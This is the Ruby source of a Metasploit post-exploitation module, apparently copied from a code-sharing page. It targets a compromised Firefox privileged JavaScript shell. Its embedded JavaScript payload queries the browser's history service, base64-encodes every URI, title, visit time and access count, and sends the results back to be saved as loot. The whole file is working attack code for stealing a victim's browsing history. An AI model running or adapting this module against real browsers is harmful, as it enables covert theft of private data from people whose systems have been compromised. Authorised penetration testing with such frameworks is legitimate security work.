Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Firefox Gather History from Privileged Javascript Shell',
16
        'Description' => %q{
17
          This module allows collection of the entire browser history from a Firefox
18
          Privileged Javascript Shell.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'joev' ],
22
        'DisclosureDate' => '2014-04-11'
23
      )
24
    )
25

26
    register_options([
27
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
28
    ])
29
  end
30

31
  def run
32
    results = js_exec(js_payload)
33
    if results.present?
34
      begin
35
        history = JSON.parse(results)
36
        history.each do |entry|
37
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
38
        end
39

40
        file = store_loot('firefox.history.json', 'text/json', rhost, history.to_json)
41
        print_good("Saved #{history.length} history entries to #{file}")
42
      rescue JSON::ParserError => e
43
        print_warning(results)
44
      end
45
    end
46
  end
47

48
  def js_payload
49
    %|
50
      (function(send){
51
        try {
52
          var service = Components
53
                .classes["@mozilla.org/browser/nav-history-service;1"]
54
                .getService(Components.interfaces.nsINavHistoryService);
55
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
56

57
          var query = service.getNewQuery();
58
          var options = service.getNewQueryOptions();
59
          var result = service.executeQuery(query, options);
60
          var fields = [];
61
          var entries = [];
62

63
          var root = result.root;
64
          root.containerOpen = true;
65

66
          for (var i = 0; i < result.root.childCount; ++i) {
67
            var child = result.root.getChild(i);
68
            if (child.type == child.RESULT_TYPE_URI) {
69
              entries.push({
70
                uri: b64(child.uri),
71
                title: b64(child.title),
72
                time: b64(child.time),
73
                accessCount: b64(child.accessCount)
74
              });
75
            }
76
          }
77

78
          result.root.containerOpen = false;
79

80
          send(JSON.stringify(entries));
81
        } catch (e) {
82
          send(e);
83
        }
84
      })(this.send);
85
    |.strip
86
  end
87
end
88

89